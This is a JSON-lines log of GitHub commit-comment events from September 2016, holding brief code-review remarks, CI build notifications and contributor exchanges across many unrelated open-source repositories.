{"id":"4527403163","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"dovansan/BesutKode.github.io"},"payload":{"comment":{"id":18927702,"position":null,"line":null,"path":null,"commit_id":"a677a9c6c1f4e7114394c88bb9cfdc26b2645a58","created_at":"2016-09-07T12:49:09Z","updated_at":"2016-09-07T12:49:09Z","body":"Hi @dovansan , you are almost done.\r\nYou only need to [edit `peserta.md`](https://github.com/BesutKode/BesutKode.github.io/edit/master/peserta.md) and submit a pull request.\r\nGood luck."}},"created_at":"2016-09-07T12:49:09Z"}
{"id":"4527403664","type":"CommitCommentEvent","actor":{"login":"sagikazarmark"},"repo":{"name":"php-http/fig-standards"},"payload":{"comment":{"id":18927704,"position":14,"line":14,"path":"proposed/http-client/http-client-meta.md","commit_id":"e3c937f5bab508f2f998e4072b86810a948c9ac2","created_at":"2016-09-07T12:49:14Z","updated_at":"2016-09-07T12:49:14Z","body":"- Create HTTP Messages\r\n- Recommend people to handle middleware logic on the client level (use php-http plugins instead for example): badly phrased, but I think you get the point\r\n\r\n??"}},"created_at":"2016-09-07T12:49:14Z"}
{"id":"4527405304","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18927706,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-07T12:49:33Z","updated_at":"2016-09-07T12:49:33Z","body":"@Nadahar Sorry, mistaping: r356. Meaning that done again before that...maybe at the beginning.\r\n> Audio transcoding to 48kHz by default on PS3 (new renderer parameter 'TranscodeAudioTo441kHz', feel free to tweak it)\r\n\r\nThat's a very good idea, that could be easily done i guess, make the `audio_resample` variable in the renderer configuration :+1: \r\n\r\n@atamariya I use it and i don't have PS3.\r\nIt give me the possibility to listen music that i will not able to without this option, as it make it strickly DLNA compliant, meaning widely and mandatory supported.\r\nI mean 192 kHz, 8 kHz, no problem if you renderer cannot, with this option it will, no need to have a crappy Play Station ;-)\r\n\r\nThat's said i will not battle for that...i doesn't like migraine ;-)"}},"created_at":"2016-09-07T12:49:33Z"}
{"id":"4527405301","type":"CommitCommentEvent","actor":{"login":"sagikazarmark"},"repo":{"name":"php-http/fig-standards"},"payload":{"comment":{"id":18927707,"position":9,"line":9,"path":"proposed/http-client/http-client.md","commit_id":"e3c937f5bab508f2f998e4072b86810a948c9ac2","created_at":"2016-09-07T12:49:34Z","updated_at":"2016-09-07T12:49:34Z","body":"When there is an error during sending the request?"}},"created_at":"2016-09-07T12:49:34Z"}
{"id":"4527406976","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"stephane-lb/openMVG"},"payload":{"comment":{"id":18927710,"position":1,"line":732,"path":"src/openMVG/sfm/sfm_data_BA_ceres_camera_functor.hpp","commit_id":"f9ee11cb9787ff5dc428d72cd22b4d15e6c12a83","created_at":"2016-09-07T12:49:53Z","updated_at":"2016-09-07T12:49:53Z","body":"ceres::sqrt?"}},"created_at":"2016-09-07T12:49:53Z"}
{"id":"4527408651","type":"CommitCommentEvent","actor":{"login":"sagikazarmark"},"repo":{"name":"php-http/fig-standards"},"payload":{"comment":{"id":18927713,"position":14,"line":14,"path":"proposed/http-client/http-client.md","commit_id":"e3c937f5bab508f2f998e4072b86810a948c9ac2","created_at":"2016-09-07T12:50:15Z","updated_at":"2016-09-07T12:50:15Z","body":"decoupled from HTTP Client implementations"}},"created_at":"2016-09-07T12:50:15Z"}
{"id":"4527408868","type":"CommitCommentEvent","actor":{"login":"schleichardt"},"repo":{"name":"commercetools/commercetools-jvm-sdk"},"payload":{"comment":{"id":18927714,"position":null,"line":null,"path":null,"commit_id":"5f384375d0d2dd3c8ab57fa73b98cebf4fe5103d","created_at":"2016-09-07T12:50:17Z","updated_at":"2016-09-07T12:50:17Z","body":"@yanns does this make sense? We talked about this in July."}},"created_at":"2016-09-07T12:50:17Z"}
{"id":"4527410842","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"stephane-lb/openMVG"},"payload":{"comment":{"id":18927727,"position":1,"line":732,"path":"src/openMVG/sfm/sfm_data_BA_ceres_camera_functor.hpp","commit_id":"f9ee11cb9787ff5dc428d72cd22b4d15e6c12a83","created_at":"2016-09-07T12:50:39Z","updated_at":"2016-09-07T12:50:39Z","body":"You must use T value."}},"created_at":"2016-09-07T12:50:39Z"}
{"id":"4527413778","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18927739,"position":null,"line":null,"path":null,"commit_id":"5cc1691878e9d19862e96356a2605c6287d67870","created_at":"2016-09-07T12:51:13Z","updated_at":"2016-09-07T12:51:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ffbTbUb7TUm9D2bSE-HBQA"}},"created_at":"2016-09-07T12:51:13Z"}
{"id":"4527414589","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"dezgeg/nixpkgs"},"payload":{"comment":{"id":18927740,"position":null,"line":null,"path":null,"commit_id":"8c3e9ea53e40e9bc5033d9e81b9b6ef98a066e3e","created_at":"2016-09-07T12:51:23Z","updated_at":"2016-09-07T12:51:23Z","body":"Incomplete, breaks eval:\r\n\r\n```\r\n$ nix-env -f . -qa '*' --meta --xml --drv-path --show-trace\r\nerror: while evaluating ‘callPackageWith’ at /home/bfo/proj/code/forks/nixpkgs3/lib/customisation.nix:93:35, called from /home/bfo/proj/code/forks/nixpkgs3/pkgs/top-level/all-packages.nix:13408:11:\r\nwhile evaluating ‘makeOverridable’ at /home/bfo/proj/code/forks/nixpkgs3/lib/customisation.nix:54:24, called from /home/bfo/proj/code/forks/nixpkgs3/lib/customisation.nix:97:8:\r\nanonymous function at /home/bfo/proj/code/forks/nixpkgs3/pkgs/applications/video/gnash/default.nix:1:1 called without required argument ‘xulrunner’, at /home/bfo/proj/code/forks/nixpkgs3/lib/customisation.nix:56:12\r\n```"}},"created_at":"2016-09-07T12:51:23Z"}
{"id":"4527415586","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"stephane-lb/openMVG"},"payload":{"comment":{"id":18927742,"position":2,"line":733,"path":"src/openMVG/sfm/sfm_data_BA_ceres_camera_functor.hpp","commit_id":"f9ee11cb9787ff5dc428d72cd22b4d15e6c12a83","created_at":"2016-09-07T12:51:35Z","updated_at":"2016-09-07T12:51:35Z","body":"You must parametrize the whole functor to use T type value, in order to make auto-differentiation works later on."}},"created_at":"2016-09-07T12:51:35Z"}
{"id":"4527416488","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18927745,"position":null,"line":null,"path":null,"commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T12:51:45Z","updated_at":"2016-09-07T12:51:45Z","body":"Unless we handle the compiler by downloading and loading it at run time ..."}},"created_at":"2016-09-07T12:51:45Z"}
{"id":"4527417165","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18927747,"position":null,"line":null,"path":null,"commit_id":"1297c3652ea1b7531b931819c2479ed9ac9daf8e","created_at":"2016-09-07T12:51:53Z","updated_at":"2016-09-07T12:51:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#S4okPrUnSX-G6Fu6-8fuoA"}},"created_at":"2016-09-07T12:51:53Z"}
{"id":"4527419780","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18927754,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T12:52:24Z","updated_at":"2016-09-07T12:52:24Z","body":"> Ifdefs are in there already, one more doesn't change anything\r\n\r\nfollowing this guide we could continue to place them everywhere because we have them already. the point here is that we have introduced a new design that should be used from now. since this change was not a fix, it has to follow the new design."}},"created_at":"2016-09-07T12:52:24Z"}
{"id":"4527422846","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18927760,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-07T12:53:01Z","updated_at":"2016-09-07T12:53:01Z","body":"Looks good now, many thanks!\r\n\r\n```\r\n-- Checking to see if CXX compiler accepts flag -flto\r\n-- Checking to see if CXX compiler accepts flag -flto - yes\r\n-- Found OpenSSL: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel/toolchain/armv7ve-libreelec-linux-gnueabi/sysroot/usr/lib/libssl.so;/home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel/toolchain/armv7ve-libreelec-linux-gnueabi/sysroot/usr/lib/libcrypto.so (found version \"2.0.0\")\r\n-- Found ZLIB: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel/toolchain/armv7ve-libreelec-linux-gnueabi/sysroot/usr/lib/libz.so (found version \"1.2.8\")\r\n-- Found RTMP: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel/toolchain/armv7ve-libreelec-linux-gnueabi/sysroot/usr/include\r\n-- RTMP_VERSION=1.0.0\r\n-- Configuring done\r\n-- Generating done\r\n-- Build files have been written to: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi2.arm-8.0-devel/inputstream.rtmp-9c05b8d/.armv7ve-libreelec-linux-gnueabi\r\n```"}},"created_at":"2016-09-07T12:53:01Z"}
{"id":"4527427015","type":"CommitCommentEvent","actor":{"login":"lxl177"},"repo":{"name":"lxl177/lxl"},"payload":{"comment":{"id":18927771,"position":2,"line":2,"path":"README.md","commit_id":"fed0c64e354508cf8ce9bf1c2cc782079725c429","created_at":"2016-09-07T12:53:49Z","updated_at":"2016-09-07T12:53:49Z","body":"sss"}},"created_at":"2016-09-07T12:53:49Z"}
{"id":"4527429059","type":"CommitCommentEvent","actor":{"login":"ryanjduffy"},"repo":{"name":"enyojs/moonstone"},"payload":{"comment":{"id":18927777,"position":29,"line":23,"path":"lib/LabeledTextItem/LabeledTextItem.less","commit_id":"c9650d7a8d43987ba32b7b8d8423c8fef2d25c83","created_at":"2016-09-07T12:54:14Z","updated_at":"2016-09-07T12:54:14Z","body":"@KunmyonChoi - I don't recall specifically but my guess is that it was added to correctly support tall glyphs without changing the overall layout by overlapping it with the header."}},"created_at":"2016-09-07T12:54:14Z"}
{"id":"4527429361","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927778,"position":null,"line":null,"path":null,"commit_id":"8f42700e2cc7101d2381134a16f938b0056f6a43","created_at":"2016-09-07T12:54:17Z","updated_at":"2016-09-07T12:54:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 958](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12871&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T12:54:17Z"}
{"id":"4527430269","type":"CommitCommentEvent","actor":{"login":"linquize"},"repo":{"name":"kevana/ui-for-docker"},"payload":{"comment":{"id":18927782,"position":null,"line":null,"path":null,"commit_id":"db5dd0c356e088322742d9a77c13f1b1061884f3","created_at":"2016-09-07T12:54:27Z","updated_at":"2016-09-07T12:54:27Z","body":"docker hub latest tag is still 0.10.1"}},"created_at":"2016-09-07T12:54:27Z"}
{"id":"4527433336","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927788,"position":null,"line":null,"path":null,"commit_id":"1bcfdefde8db5ec2edfb3e141ecc0dc8ad5d081f","created_at":"2016-09-07T12:55:03Z","updated_at":"2016-09-07T12:55:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 957](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12868&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:35"}},"created_at":"2016-09-07T12:55:03Z"}
{"id":"4527434967","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"LostTeam/LostBot"},"payload":{"comment":{"id":18927790,"position":null,"line":null,"path":null,"commit_id":"c9ed053b51c2af2da8b7cbabc2474a62f5673b8b","created_at":"2016-09-07T12:55:21Z","updated_at":"2016-09-07T12:55:21Z","body":"it seems everyone has their own coding style, mine just happens to have everything compacted"}},"created_at":"2016-09-07T12:55:21Z"}
{"id":"4527444691","type":"CommitCommentEvent","actor":{"login":"jreback"},"repo":{"name":"conda-forge/pandas-feedstock"},"payload":{"comment":{"id":18927808,"position":null,"line":null,"path":null,"commit_id":"3545dd1e22bd50e95fd4ec90da8a86f52883bce6","created_at":"2016-09-07T12:57:10Z","updated_at":"2016-09-07T12:57:10Z","body":"ok sure"}},"created_at":"2016-09-07T12:57:10Z"}
{"id":"4527448135","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"riyan010699/BesutKode.github.io"},"payload":{"comment":{"id":18927814,"position":null,"line":null,"path":null,"commit_id":"0500a7f68e6602276efb3c9ed08d36fe3b605f81","created_at":"2016-09-07T12:57:49Z","updated_at":"2016-09-07T12:57:49Z","body":"Hi @riyan010699 , you are almost done.\r\nYou only need to [edit `peserta.md`](https://github.com/BesutKode/BesutKode.github.io/edit/master/peserta.md), add your row, and submit a pull request.\r\nGood luck."}},"created_at":"2016-09-07T12:57:49Z"}
{"id":"4527448747","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal-sqlite3"},"payload":{"comment":{"id":18927817,"position":null,"line":null,"path":null,"commit_id":"0396d637716428c066c9a7b7a413a0b31b635f71","created_at":"2016-09-07T12:57:56Z","updated_at":"2016-09-07T12:57:56Z","body":"You must have an old copy of the shard, try doing `crystal deps update` or similar. Note that the error you are getting is at line 18, but [there's nothing there](https://github.com/crystal-lang/crystal-sqlite3/blob/master/src/sqlite3/lib_sqlite3.cr#L18)."}},"created_at":"2016-09-07T12:57:56Z"}
{"id":"4527448884","type":"CommitCommentEvent","actor":{"login":"bska"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18927819,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-07T12:57:58Z","updated_at":"2016-09-07T12:57:58Z","body":"> Now I believe this is fixed by 1209c90\r\n\r\nI've performed a **very** quick test on my Linux system and the application once more behaves properly (no longer crashes upon loading a model).  Thanks a lot for the investigation and analysis!"}},"created_at":"2016-09-07T12:57:58Z"}
{"id":"4527451439","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18927823,"position":14,"line":364,"path":"src/evaluate.cpp","commit_id":"431ea1354d1fb78f420ec563f71886d72dae68f9","created_at":"2016-09-07T12:58:26Z","updated_at":"2016-09-07T12:58:26Z","body":"line 364: maybe a better name would be attackers, rather than blockers?"}},"created_at":"2016-09-07T12:58:26Z"}
{"id":"4527458372","type":"CommitCommentEvent","actor":{"login":"sagikazarmark"},"repo":{"name":"php-http/fig-standards"},"payload":{"comment":{"id":18927839,"position":45,"line":45,"path":"proposed/http-client/http-client.md","commit_id":"e3c937f5bab508f2f998e4072b86810a948c9ac2","created_at":"2016-09-07T12:59:46Z","updated_at":"2016-09-07T12:59:46Z","body":"\\Psr"}},"created_at":"2016-09-07T12:59:46Z"}
{"id":"4527460494","type":"CommitCommentEvent","actor":{"login":"DoDoENT"},"repo":{"name":"psiha/build"},"payload":{"comment":{"id":18927846,"position":null,"line":null,"path":null,"commit_id":"ae0466d6f032ad07bf080e9744c4b589bb0587d5","created_at":"2016-09-07T13:00:12Z","updated_at":"2016-09-07T13:00:12Z","body":"How to undo add_compile_options? There is no remove_compile_options command..."}},"created_at":"2016-09-07T13:00:12Z"}
{"id":"4527461032","type":"CommitCommentEvent","actor":{"login":"sachingarg05"},"repo":{"name":"cocos2d/cocos2d-x"},"payload":{"comment":{"id":18927847,"position":null,"line":null,"path":null,"commit_id":"569681f6bd93e01cedc6ffa30ed44ad013fe3f72","created_at":"2016-09-07T13:00:16Z","updated_at":"2016-09-07T13:00:16Z","body":"@minggo, in the controller file above you have updated target to api 10 instead of 13. Was this the intention or is this a typo?"}},"created_at":"2016-09-07T13:00:16Z"}
{"id":"4527463533","type":"CommitCommentEvent","actor":{"login":"zandbelt"},"repo":{"name":"make-all/mod_auth_openidc"},"payload":{"comment":{"id":18927854,"position":null,"line":null,"path":null,"commit_id":"6b668d6d23b7dff5c71f61305f12f4acf2b8a097","created_at":"2016-09-07T13:00:41Z","updated_at":"2016-09-07T13:00:41Z","body":"Please read this: https://oauth.net/articles/authentication/ and you'll see that this allows an attacker to impersonate a user at the module by presenting an access token obtained for a different application to the user info endpoint. There's a reason for OpenID Connect to define an additional token on top of an access token to pass user identity."}},"created_at":"2016-09-07T13:00:41Z"}
{"id":"4527466099","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"ggmich/BesutKode.github.io"},"payload":{"comment":{"id":18927857,"position":null,"line":null,"path":null,"commit_id":"6d22c2f7478f0068470ce17c83e063b820707d14","created_at":"2016-09-07T13:01:07Z","updated_at":"2016-09-07T13:01:07Z","body":"Hi ggmich.\r\nI do not see your username on https://projecteuler.net/country=Indonesia;page=2 .\r\nDid you put your answer into  https://projecteuler.net/problem=1 ?"}},"created_at":"2016-09-07T13:01:07Z"}
{"id":"4527483339","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927906,"position":null,"line":null,"path":null,"commit_id":"8f42700e2cc7101d2381134a16f938b0056f6a43","created_at":"2016-09-07T13:04:21Z","updated_at":"2016-09-07T13:04:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 958](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12871&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:10:05"}},"created_at":"2016-09-07T13:04:21Z"}
{"id":"4527483359","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"kekavigi/BesutKode.github.io"},"payload":{"comment":{"id":18927907,"position":null,"line":null,"path":null,"commit_id":"eddc99021ca4ef661bcce90e8130ad545aa3f4b9","created_at":"2016-09-07T13:04:22Z","updated_at":"2016-09-07T13:04:22Z","body":"Looking good.  Please [create a pull request](https://github.com/BesutKode/BesutKode.github.io/compare/master...kekavigi:patch-2) quickly, otherwise you will have another merge conflict."}},"created_at":"2016-09-07T13:04:22Z"}
{"id":"4527484227","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"andres-erbsen/listproxy"},"payload":{"comment":{"id":18927911,"position":135,"line":130,"path":"main.go","commit_id":"669620e1cbf9eb80a45a084a375c9e15972de8f2","created_at":"2016-09-07T13:04:31Z","updated_at":"2016-09-07T13:04:31Z","body":"@daniel-ziegler this is probably the right place to hook in something other than a reverse proxy"}},"created_at":"2016-09-07T13:04:31Z"}
{"id":"4527486267","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18927918,"position":14,"line":364,"path":"src/evaluate.cpp","commit_id":"431ea1354d1fb78f420ec563f71886d72dae68f9","created_at":"2016-09-07T13:04:55Z","updated_at":"2016-09-07T13:04:55Z","body":"Yes, 'blockers' makes absolutely no sense here! Maybe 'pinners'."}},"created_at":"2016-09-07T13:04:55Z"}
{"id":"4527497402","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18927947,"position":null,"line":null,"path":null,"commit_id":"c5eaa1a9637b9387114d849c5d1c14504f9e7f1c","created_at":"2016-09-07T13:06:59Z","updated_at":"2016-09-07T13:06:59Z","body":"Wait a minute, becoming dangerously close to a plugin-interface...  -.-"}},"created_at":"2016-09-07T13:06:59Z"}
{"id":"4527497967","type":"CommitCommentEvent","actor":{"login":"perrystephenson"},"repo":{"name":"perrystephenson/impactface"},"payload":{"comment":{"id":18927952,"position":null,"line":null,"path":null,"commit_id":"e1740b1537490ce6e815953b9477f26c7f4b5a6c","created_at":"2016-09-07T13:07:06Z","updated_at":"2016-09-07T13:07:06Z","body":"This commit fixes #2 "}},"created_at":"2016-09-07T13:07:06Z"}
{"id":"4527504795","type":"CommitCommentEvent","actor":{"login":"sudheerkr"},"repo":{"name":"twilio/twilio-node"},"payload":{"comment":{"id":18927960,"position":81,"line":145,"path":"lib/AccessToken.js","commit_id":"f2df64f9c904608bb01ca7b7971a1c2e1da0ae55","created_at":"2016-09-07T13:08:23Z","updated_at":"2016-09-07T13:08:23Z","body":"My code is breaking because of **includes** method. when am I doing token.toJwt()? it was working fine with contains method. so please check it and tell me, how to fix this issue?"}},"created_at":"2016-09-07T13:08:23Z"}
{"id":"4527506526","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18927964,"position":null,"line":null,"path":null,"commit_id":"71f4105a37f73968fe18cd4b63f49d62b723aad0","created_at":"2016-09-07T13:08:42Z","updated_at":"2016-09-07T13:08:42Z","body":"and do lasers count as projectiles?"}},"created_at":"2016-09-07T13:08:42Z"}
{"id":"4527506837","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18927965,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T13:08:46Z","updated_at":"2016-09-07T13:08:46Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2331 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T13:08:46Z"}
{"id":"4527509079","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18927967,"position":null,"line":null,"path":null,"commit_id":"54f0efaea08fe43d215f02ffe92593ff9852b7e1","created_at":"2016-09-07T13:09:13Z","updated_at":"2016-09-07T13:09:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KZh3ovazSjSZzw-agao_LA"}},"created_at":"2016-09-07T13:09:13Z"}
{"id":"4527510799","type":"CommitCommentEvent","actor":{"login":"emackey"},"repo":{"name":"AnalyticalGraphicsInc/cesium"},"payload":{"comment":{"id":18927968,"position":null,"line":null,"path":null,"commit_id":"7ce1facd111ffbbe89f83ad305451daf82a8bc66","created_at":"2016-09-07T13:09:32Z","updated_at":"2016-09-07T13:09:32Z","body":"For reference this is #4120."}},"created_at":"2016-09-07T13:09:32Z"}
{"id":"4527515174","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18927976,"position":30,"line":30,"path":"src/main/kotlin/me/exz/omniocular/OculusCordis.kt","commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T13:10:20Z","updated_at":"2016-09-07T13:10:20Z","body":"Agree. Now on my todo list now."}},"created_at":"2016-09-07T13:10:20Z"}
{"id":"4527518168","type":"CommitCommentEvent","actor":{"login":"mamatucci"},"repo":{"name":"ThinkBigAnalytics/Bootcamp_Prague_Sept16"},"payload":{"comment":{"id":18927980,"position":null,"line":null,"path":null,"commit_id":"65ab0aa5c1cf056a7515568da886c5bd8bd7f03a","created_at":"2016-09-07T13:10:51Z","updated_at":"2016-09-07T13:10:51Z","body":"fix something is not the best way to describe a commit ;P"}},"created_at":"2016-09-07T13:10:51Z"}
{"id":"4527522413","type":"CommitCommentEvent","actor":{"login":"cbrouchy"},"repo":{"name":"cbrouchy/prueba_svn"},"payload":{"comment":{"id":18927984,"position":null,"line":null,"path":null,"commit_id":"312ad1c19b6cd40890cef606f40d1467dce78320","created_at":"2016-09-07T13:11:38Z","updated_at":"2016-09-07T13:11:38Z","body":"subir nuevamente pantalla\r\n"}},"created_at":"2016-09-07T13:11:38Z"}
{"id":"4527524442","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18927994,"position":null,"line":null,"path":null,"commit_id":"ddcca01c9aa48caafd277cd4d477157695d129bc","created_at":"2016-09-07T13:12:00Z","updated_at":"2016-09-07T13:12:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Q4XkL9UMRcK5ukG_n7RQhQ"}},"created_at":"2016-09-07T13:12:00Z"}
{"id":"4527525772","type":"CommitCommentEvent","actor":{"login":"tsegismont"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18927999,"position":49,"line":61,"path":"src/test/java/io/vertx/test/core/HttpClientRequestBuilderTest.java","commit_id":"e595e83ca3428472843871ac05a67a2e8cc145b2","created_at":"2016-09-07T13:12:16Z","updated_at":"2016-09-07T13:12:16Z","body":"This should be `createPost`"}},"created_at":"2016-09-07T13:12:16Z"}
{"id":"4527526608","type":"CommitCommentEvent","actor":{"login":"sqawwam"},"repo":{"name":"sqawwam/genius-programs"},"payload":{"comment":{"id":18928000,"position":null,"line":null,"path":null,"commit_id":"4792b3a0f890cfc02793e06d487cbcbe097b81a7","created_at":"2016-09-07T13:12:25Z","updated_at":"2016-09-07T13:12:25Z","body":"This repository is made for the beginners ..\r\nIt contains come important C programs which r mostly asked to a fresher in interviews."}},"created_at":"2016-09-07T13:12:25Z"}
{"id":"4527526889","type":"CommitCommentEvent","actor":{"login":"fatso83"},"repo":{"name":"holman/dotfiles"},"payload":{"comment":{"id":18928001,"position":null,"line":null,"path":null,"commit_id":"666cb053e9d27d279c4643dce1ca09c2f8b69f2e","created_at":"2016-09-07T13:12:27Z","updated_at":"2016-09-07T13:12:27Z","body":"To make this work on more than just BSD systems (some may want this on GNU systems like Linux, Cygwin, Mingw/Git Bash), dropping the `-E` and adding some backslashes will make it work cross-platform:\r\n```bash\r\nalias gd='git diff --color | sed \"s/^\\([^-+ ]*\\)[-+ ]/\\\\1/\"'\r\n```\r\n"}},"created_at":"2016-09-07T13:12:27Z"}
{"id":"4527533960","type":"CommitCommentEvent","actor":{"login":"rajeshrevelli"},"repo":{"name":"rajeshrevelli/prjNodejs"},"payload":{"comment":{"id":18928018,"position":1,"line":1,"path":"Sample.txt","commit_id":"779f47ebed3a26c048d817afece5a1f550ce5512","created_at":"2016-09-07T13:13:37Z","updated_at":"2016-09-07T13:13:37Z","body":"Test Comment"}},"created_at":"2016-09-07T13:13:37Z"}
{"id":"4527535086","type":"CommitCommentEvent","actor":{"login":"oniram88"},"repo":{"name":"globalize/globalize"},"payload":{"comment":{"id":18928020,"position":8,"line":200,"path":"lib/globalize/active_record/instance_methods.rb","commit_id":"9b4199bbf5f79cac290c3164547d6d5077f8e1a8","created_at":"2016-09-07T13:13:49Z","updated_at":"2016-09-07T13:13:49Z","body":"It's better to write:\r\n`attributes.symbolize_keys! if attributes.respond_to?(:symbolize_keys!)`\r\n"}},"created_at":"2016-09-07T13:13:49Z"}
{"id":"4527536224","type":"CommitCommentEvent","actor":{"login":"leonlue000"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18928022,"position":null,"line":null,"path":null,"commit_id":"034543036a3c9aca7859d5e0f0e48f21106a81f3","created_at":"2016-09-07T13:14:00Z","updated_at":"2016-09-07T13:14:00Z","body":"Wie kann man sich die neuste Version installieren??"}},"created_at":"2016-09-07T13:14:00Z"}
{"id":"4527548598","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18928044,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T13:16:16Z","updated_at":"2016-09-07T13:16:16Z","body":"Its pretty simple: I will not create tons of useless code for a simple log line\r\nhere are the options:\r\n1.) keep the ifdef\r\n2.) define this path for all platforms\r\n3.) remove the log line\r\n4.) you insist on having your way once again.\r\nIn this case you can revert the original commit and I will simply stop maintaining all of our PPAs"}},"created_at":"2016-09-07T13:16:16Z"}
